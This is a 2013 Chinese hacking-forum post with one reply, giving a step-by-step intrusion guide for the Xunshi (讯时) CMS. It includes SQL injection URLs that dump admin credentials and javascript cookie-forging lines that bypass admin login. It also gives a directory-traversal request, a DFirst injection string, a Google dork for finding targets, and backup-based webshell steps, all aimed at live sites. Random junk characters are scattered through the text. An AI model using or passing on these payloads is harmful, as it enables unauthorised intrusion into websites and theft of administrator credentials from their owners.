找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2665|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘+ j2 n/ _! t  n4 n) I

  _1 e% H9 D. z4 M% n" s在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)' w' M1 V, R+ Z5 i$ c2 m
/ H* V% g% Z3 R. m* ?2 e8 M/ u
以下本文总结来自黑防去年第9期杂志上的内容...
; _% J# D$ Z  u/ T. p# n3 E* M$ P7 c6 J
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%8 B& u0 G$ D8 N6 f

, E( c& v4 V: V) l% l" B26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
( c. X: ^0 R0 ]" H) v( ?' ~& ~
7 J( A5 L/ D* [  v; d' M: {记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况- C- @1 Q1 k4 z
这里一个注入
- O4 l, v3 K! W5 N
3 v1 d+ M  T  w6 a$ `7 X4 W$ @3 X效果如图:
/ x$ S$ S6 N: D0 u1 I3 T+ \. a# M1 q3 H# h
/ W) l. `$ a: E/ L9 h% x5 {

9 V. k" U" W2 @: s& J这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.) J; x9 {  `# j) _) a" n

6 A2 K% G4 t2 J$ U1 I1 Z' S$ T密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
5 z' ]" M5 r- ]0 I: W) m
* J. U& a! o+ p; njavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
; K  D2 S; h0 ~# |4 T. r5 W4 g
1 U* S+ l; z! C那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:& H( \$ N. u3 a3 h, Y3 k& S% n
, D; j% z$ t6 s8 y3 e
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞& W! K' z; X+ L/ f& O- V

5 g- o; P( a7 C) b: |它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
$ r3 h5 ~+ ?5 O! ?( Y" x" a/ g: ^* @4 j% |8 [1 P
访问这页面来列目录..步骤如下:; m+ j8 a5 c' h6 M7 q7 s
/ F8 P5 ^; B+ p9 u
javascript:alert(document.cookie="admindj=1") 2 Z! L, `$ }# t# Y3 X
3 a5 q& ], |- u
http://www.political-security.co ... asp?id=46&dir=../..7 q( p2 _0 }% _1 Y/ Q/ N6 s3 w

5 e5 ?- {4 ]% o3 d9 {效果如图:
4 |' w% o+ o5 {) l& A+ W. M1 B/ s- i, r! u

& y% M% b  i) |, b. w  T' A0 k6 Z- x& H' j' ]: j* b
这样全站目录都能瞧了..找到后台目录..进去..
8 E4 [1 [( S! K! d8 ~/ f6 A, M* g7 X; _
那么进了后台怎么拿shell??上传--备份就ok了..4 _+ V: x" W; D- B$ l  g3 _0 W' a
# C2 h0 n: i# F4 S& b) k" H
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
. D4 H. l( l0 Y2 S2 H, Z( S. n9 N9 Q6 ~6 S# c
这个我也碰到过一次..你都可以通过列目录来实现..+ f2 i' X! Y( ?$ E5 y7 ~

7 h) o; U* b( m& M3 j; Wjavascript:alert(document.cookie="admindj=1")
! S. I* y5 j' S$ w) w" X5 [% P! @  {% Q1 a0 [) n* X
http://www.political-security.co ... p?action=BackupData
9 m7 O, g/ n, Y, t( i& i, s
1 S) B4 C* d$ \7 L备份ok..: P  A3 t3 l, w) s7 Y
' M: m% S5 u! }  N6 X- d
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
0 U) H6 M7 z- [# l3 H
# Z% F9 \* e: A+ C在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
+ h1 [& M" {- z, d9 V) o  Z' ~: @* g0 `, c, [! c# A1 `
然后访问此页面进行注入..步骤如下:
! k- t. d& J% X! O( }/ h( ^5 c
3 [- E* p2 C! F! ejavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")8 H9 q: g( l. e8 f+ T

/ v  ~5 ?* Y# G- Y/ Y5 E然后请求admin/admin_chk.asp页面+ H9 V0 I3 J6 b; C1 Z) y

. t* Y1 r9 ^" F* _输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
6 @! B" g9 i/ K
9 [6 R3 v1 @: S5 I* R* ]0 g( a26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
( M6 S4 |) p0 q8 l3 \0 C" ]9 {9 B
效果如图所示:( j9 e, G# z: |6 O
( [! K! O* q: A) o  K$ v- M9 o
' R7 D5 G+ h) ~6 G

. Q" I- f/ h! W0 S6 F讯时漏洞2( r1 ^' F% c: t3 D
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)1 U4 n. H0 z0 W3 E# a2 u

7 B4 r) f: E1 C1、/admin/admin_news_pl_view.asp?id=1/ U( R+ k0 F9 @5 [
//id任意 填入以下语句
2 w) Z, M. ?0 O5 {. X& X% b 9 u- g: {9 Q/ H& {1 L
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
) P$ `5 S8 p6 p: z( ?4 [  D( S
. H! R! e  l( ^; g- ]2 v) E) L  S+ o' d" K0 r
" z4 T/ v: t- Q0 b
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
/ i3 Q$ Z6 k! q; J8 v ' F( R& e# u6 Q$ v' c& f
6 t* s( S" A3 y% O1 [

0 \1 W% s; C5 f& E0 d0 b爆出管理员帐号和密码了
2 B/ b: w8 T. d- [/ q0 @. @ & ~7 f& N) K/ b

5 N4 v% b. f, `# Z" L7 p3 n: j! c8 Y2 {6 Q$ l3 j0 ~) C
4、cookies进后台
: b! A2 ]& Q2 G4 [- Q4 c. u& K  [ % X4 j) U- |7 ]7 W  Q5 W
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
! V& T$ j1 z+ K. c7 u# z& `
  c: x, ^4 q  u& l$ l6 R9 p2 n4 F3 r; i- ~! Y: q7 ~# h8 V6 ?
  j% A8 _# j* i
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
! G) U, M" L: J0 t, J& [9 F   m! ~) a& y: o! b, ?. g( k. L

, m0 ~& y5 [- t0 l% f
0 u  M2 b' e8 [) r& z& l" y6、后台有上传和备份取SHELL不难。
, T% k3 b6 _1 \0 u" N( T 3 I% ^% o/ L- ~" E- m) f% Q
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
* V7 ^% b7 a5 q+ K3 ~  p6 r% I8 b
/ c6 l! m/ I9 c) `1 ?5 o. \逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
/ j' z  w% C) y( Z; t0 W! I2 H: }- k. R% \' R& s. r

4 P9 t6 {1 i* ~# D5 j
) o+ m7 x& ]7 `  E: R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表